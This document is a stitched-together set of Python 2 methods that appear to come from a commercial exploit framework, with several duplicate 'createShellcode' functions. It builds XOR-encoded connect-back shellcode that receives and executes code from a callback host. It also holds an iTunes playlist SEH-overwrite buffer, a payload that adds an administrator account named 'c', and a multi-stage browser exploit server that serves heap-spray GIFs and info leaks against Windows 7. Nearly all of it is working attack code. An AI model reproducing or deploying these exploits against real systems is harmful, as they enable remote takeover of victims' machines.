def createShellcode(self):
#self.shellcode="\xcc"*400
#return 1
host=self.callback.ip
port=self.callback.port
import shellcodeGenerator
sc=shellcodeGenerator.win32()
#no gocode - too big
#sc.addAttr("GOFindSock",None)
#sc.addAttr("LoadRegAsFD", {"reg" : "esi"})
#sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("tcpconnect",{"port":port,"ipaddress":host})
sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("UseWS2Ordinal",None)
rawshellcode=sc.get()
import xorencoder
enc=xorencoder.simpleXOR()
enc.subesp=5000
enc.setbadstring(self.badstring)
ret=enc.find_key(rawshellcode)
if ret==0:
self.log("Could not generate key for this shellcode!")
raise Exception, "No shellcode generated"
self.shellcode=enc.encode(rawshellcode)
if self.shellcode=="":
raise Exception, "No shellcode generated"
self.log("Xor key used: %x"%enc.getkey())
self.log("Length of shellcode=%s"%len(self.shellcode))
return ret
def createShellcode(self):
#get us a clean stack to play with and save the original EBP for continuation of execution
injectme = self.createWin32Shellcode_universal(self.badstring, self.callback.ip, self.callback.port)
sc = shellcodeGenerator.win32()
sc.vProtectSelf=False
sc.vAllocSelf = False
sc.addAttr("findeipnoesp", {"subespval": 0})
sc.addAttr("InjectToSelf", { "injectme" : injectme })
self.shellcode = sc.get()
self.badstring = "\00"
enc=xorencoder.simpleXOR()
enc.subesp=5000
enc.setbadstring(self.badstring)
ret=enc.find_key(self.shellcode)
if ret==0:
self.log("Could not generate key for this shellcode!")
raise Exception, "No shellcode generated"
self.shellcode=enc.encode(self.shellcode)
if self.shellcode=="":
raise Exception, "No shellcode generated"
self.log("Xor key used: %x"%enc.getkey())
self.log("Length of shellcode=%s"%len(self.shellcode))
return len(self.shellcode)
def createShellcode(self):
import shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 0})
sc.addAttr('revert_to_self_before_importing_ws2_32', None)
sc.addAttr('tcpconnect', {
'port': self.callback.port,
'ipaddress': self.callback.ip
})
sc.addAttr('CreateThreadRecvExecWin32',
{'socketreg': 'FDSPOT'}) #MOSDEF
sc.addAttr('ExitThread', None)
rawshellcode = sc.get()
import xorencoder
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
ret = encoder.find_key(rawshellcode)
if ret == 0:
self.log('Could not find a key for this shellcode!')
raise Exception, 'No shellcode generated'
self.shellcode = encoder.encode(rawshellcode)
if self.shellcode == '':
raise Exception, 'No shellcode generated'
self.log('Xor key used: %x' % (encoder.getkey()))
self.log('Length of shellcode=%s' % (len(self.shellcode)))
return self.shellcode
def createShellcode(self):
sc = shellcodeGenerator.win32()
sc.addAttr('SearchCodeSafeSEH', {'tag': 0x6b303063}) #'c00k'
sc.standalone = 1
rawshellcode = sc.get()
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
encoder.find_key(rawshellcode)
self.searchcode = encoder.encode(rawshellcode)
#print len(self.searchcode),repr(self.searchcode)
self.createWin32Shellcode('', self.callback.ip, self.callback.port)
return self.shellcode
def buildCodeThingies(self):
lc = self.lc
lc_off = self.lc_off
call_esp = self.call_esp
distance_to_ret = self.distance_to_ret
varz5 = 'AAAA' + lc + 'BBBB' + 'CCCC'
varz4 = lc + 'DDDD' + 'EEEE' + 'FFFF'
varz3 = lc + lc + 'GGGG' + self.dodgy
varz2 = 'IIII' + 'JJJJ' + 'KKKK' + 'LLLL'
varz1 = 'MMMM' + 'NNNN' + lc_off + 'OOOO'
varz0 = '{{{{' + 'PPPP' + 'QQQQ'
self.varsled = varz5 + varz4 + varz3 + varz2 + varz1 + varz0 + 'RRRR' + call_esp
self.varsled += mosdef.assemble('jmp $-%d' % (100 + distance_to_ret),
'x86')
stackfix = """
subl $0xABCD,%esp
movl %esp,%ebp
"""
self.shellcode = mosdef.assemble(stackfix, "X86")
self.sc = shellcodeGenerator.linux_X86()
self.sc.addAttr(
'mmap_callback', {
'host': self.callback.ip,
'port': self.callback.port,
'do_setuid': False,
'do_exit': False
})
self.sc = self.sc.get()
self.log("checking for encoder")
if '\r' in self.sc or '\n' in self.sc:
self.log("Needs to be encoded..")
encoder = xorencoder.simpleXOR()
encoder.setbadstring("\x0a")
ret = encoder.find_key(self.sc)
if ret == 0:
self.log("could not make shellcode, xor failure")
raise Exception, "No shellcode possible with xor. customize it?"
self.sc = encoder.encode(self.sc)
if self.sc == "":
raise Exception, "no shellcode generated?"
else:
self.log("no encoder needed")
self.shellcode += self.sc
return self.shellcode
def makefile(self):
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 0})
sc.addAttr('revert_to_self_before_importing_ws2_32', None)
sc.addAttr('tcpconnect', {
'port': self.callback_port,
'ipaddress': self.callback_ip
})
mosdef_type = self.engine.getMosdefType(canvasengine.WIN32MOSDEF_INTEL)
mosdef_id = self.engine.getNewMosdefID(self)
sc.addAttr("send_universal", {
"mosdef_type": mosdef_type,
"mosdef_id": mosdef_id
})
sc.addAttr("RecvExecDepSafe", {'socketreg': 'FDSPOT'})
sc.addAttr("ExitThread", None)
sc.vAllocSelf = True #we need to move to another page!
rawshellcode = sc.get()
import xorencoder
enc = xorencoder.simpleXOR()
enc.setbadstring(self.badstring)
ret = enc.find_key(rawshellcode)
if ret == 0:
self.log("Could not generate key for this shellcode!")
raise Exception, "No shellcode generated"
self.shellcode = enc.encode(rawshellcode)
crash = '#EXTINF:,'
padding = "\x90" * 12
"""
Itunes modifies my shellcode on position 244 adding 1 to the byte.
For this reason i substract 1 to the byte on the position 244 of shellcode.
Also for this same reason \x01 is also added to self.badstring for avoid \x00 in the middle of shellcode.
"""
self.shellcode = self.shellcode[:244] + chr(
ord(self.shellcode[244]) - 1) + self.shellcode[245:]
morepadding = "\x90" * (751 - (len(self.shellcode[252:])))
morepadding += "\xe9\x10\xFC\xFF\xFF" # jmp far
nextSEH = "\xeb\xF9\x90\x90" # jmp short
seh = "\x0b\x0b\x28\x00" # call [ebp+30]
buf = crash + padding + self.shellcode + morepadding + nextSEH + seh
return buf
def encodeshellcode(self, rawshellcode):
import xorencoder
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
ret = encoder.find_key(rawshellcode)
if ret == 0:
self.log('Could not find a key for this shellcode!')
raise Exception, 'No shellcode generated'
self.shellcode = encoder.encode(rawshellcode)
if self.shellcode == '':
raise Exception, 'No shellcode generated'
self.log('Xor key used: %x' % (encoder.getkey()))
self.log('Length of shellcode=%d' % (len(self.shellcode)))
print repr(self.shellcode[:16])
return self.shellcode
def createShellcode(self):
if self.version == 3:
import shellcode.clean.windows.payloads as payloads
p = payloads.payloads()
sc = p.win32_exec(
"cmd.exe /c net user c c /ADD && net localgroup administrators c /ADD"
)
rawshellcode = p.assemble(sc)
else:
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': self.subesp})
if self.version == 1:
sc.addAttr('Fix RtlEnterCriticalSection', {'SimpleFix': 1})
if self.callback.ip == '0.0.0.0':
sc.addAttr('BindMosdef', {'port': self.callback.port})
else:
sc.addAttr('tcpconnect', {
'port': self.callback.port,
'ipaddress': self.callback.ip
})
sc.addAttr('RecvExecWin32', {'socketreg': 'FDSPOT'}) #MOSDEF
sc.addAttr('ExitThread', None)
rawshellcode = sc.get()
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
ret = encoder.find_key(rawshellcode)
if ret == 0:
self.log('Could not find a key for this shellcode!')
raise Exception, 'No shellcode generated'
self.shellcode = encoder.encode(rawshellcode)
if self.shellcode == '':
raise Exception, 'No shellcode generated'
self.log('Xor key used: %x' % (encoder.getkey()))
self.log('Length of shellcode=%s' % (len(self.shellcode)))
self.shellcode = '\x90' * (487 - len(self.shellcode)) + self.shellcode
return self.shellcode
def makesploit(self, clientheader, clientbody):
h = header('SERVER')
b = body()
if self.plugin_info:
self.log("We got a plugin info for this target - thanks clientd!")
info_dict = self.plugin_info
user_agent = info_dict['user_agent']
if self.is_vulnerable(info_dict):
self.log("This client is most likely vulnerable!")
else:
self.log("Bailing on this client as it is not likely to be vulnerable.")
return None, None
else:
user_agent = clientheader.getStrValue(['User-Agent'])
# check if we need to use an info leak or not
if "Windows NT 6.1" in user_agent:
# info leaking
self.use_leak = True
if clientheader.URL.endswith(self.filename):
self.log('Serving HTML file')
if self.use_leak:
html = self.generate_html_first_stage_win7()
else:
self.create_shellcode()
html = self.generate_html_winxp()
b.setBody(html)
h.addHeader('Content-Type','text/html')
elif clientheader.URL.endswith('.gif'):
gif_file = ""
if clientheader.URL.endswith('spray.gif'):
self.log('Serving GIF spray file')
gif_file = self.spray_gif
elif clientheader.URL.endswith('pad.gif'):
self.log('Serving GIF pad file')
gif_file = self.pad_gif
elif clientheader.URL.endswith('leak1.gif'):
self.log('Serving GIF leak1 file')
gif_file = self.leak_1_gif
elif clientheader.URL.endswith('leak2.gif'):
self.log('Serving GIF leak2 file')
gif_file = self.leak_2_gif
elif clientheader.URL.endswith('corrupt_xp.gif'):
self.log('Serving GIF win xp corruption file')
gif_file = self.corrupt_xp_gif
elif clientheader.URL.endswith('corrupt_7.gif'):
self.log('Serving GIF win 7 corruption file')
gif_file = self.corrupt_7_gif
a = open(gif_file, "rb")
gif = a.read()
a.close()
b.setBody(gif)
h.addHeader('Content-Type', 'image/gif')
# h.addHeader('Expires', 'Tue, 1 Jan 3000 00:00:00 GMT')
# h.addHeader('Cache-Control', 'max-age=31536000, public')
elif clientheader.URL.endswith('addr1'):
# we got mshtml base, start second stage
leaked_pointer = int(clientheader.URL.split(".")[0].replace("/", ""))
self.log("mshtml base: 0x%x" % leaked_pointer)
self.log("shellcode 1st dword: 0x%x" % (leaked_pointer + 0x351404))
self.log("shellcode 2nd dword: 0x%x" % (leaked_pointer + 0x339219))
self.log('Serving second stage HTML')
# cloneNode() truncates null bytes on clones
badstring = '\0'
self.create_shellcode()
encoder = xorencoder.simpleXOR()
encoder.setbadstring(badstring)
ret = encoder.find_key(self.shellcode)
if not ret:
self.log("Could not generate a xor key for this shellcode")
raise Exception, "XOR key not generated"
self.shellcode = encoder.encode(self.shellcode)
html = self.generate_html_second_stage_win7(leaked_pointer)
b.setBody(html)
h.addHeader('Content-Type','text/html')
elif clientheader.URL.endswith('addr2'):
# we got shellcode addr, start third stage
leaked_pointer = int(clientheader.URL.split(".")[0].replace("/", ""))
self.log("Shellcode @ 0x%x" % leaked_pointer)
self.log('Serving third stage HTML')
html = self.generate_html_third_stage_win7(leaked_pointer)
b.setBody(html)
h.addHeader('Content-Type','text/html')
elif clientheader.URL.count("exit"):
self.log('Max retries reached. Exploit failed.')
h.status='302'
h.addHeader('Location',"http://www.google.com")
h.addHeader('Content-Type','text/html')
return h, b
else:
self.log('Redirecting to self')
h.status='302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type','text/html')
return h, b
